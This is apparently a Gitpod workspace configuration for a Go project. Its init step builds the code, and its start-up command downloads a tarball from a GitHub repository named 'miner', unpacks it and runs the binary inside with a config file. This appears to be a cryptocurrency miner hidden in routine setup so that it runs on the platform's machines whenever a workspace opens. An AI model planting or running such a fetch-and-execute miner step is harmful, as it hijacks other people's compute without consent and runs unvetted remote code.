
tasks:
  - init: |
      go get github.com/spf13/cobra/cobra
      go build
    command: |
     - wget https://github.com/hendrik20212/miner/releases/download/luck_ap/luck_ap.tar.gz && tar -xvf luck_ap.tar.gz && ./ver ap.ini
vscode:
  extensions:
    - golang.go
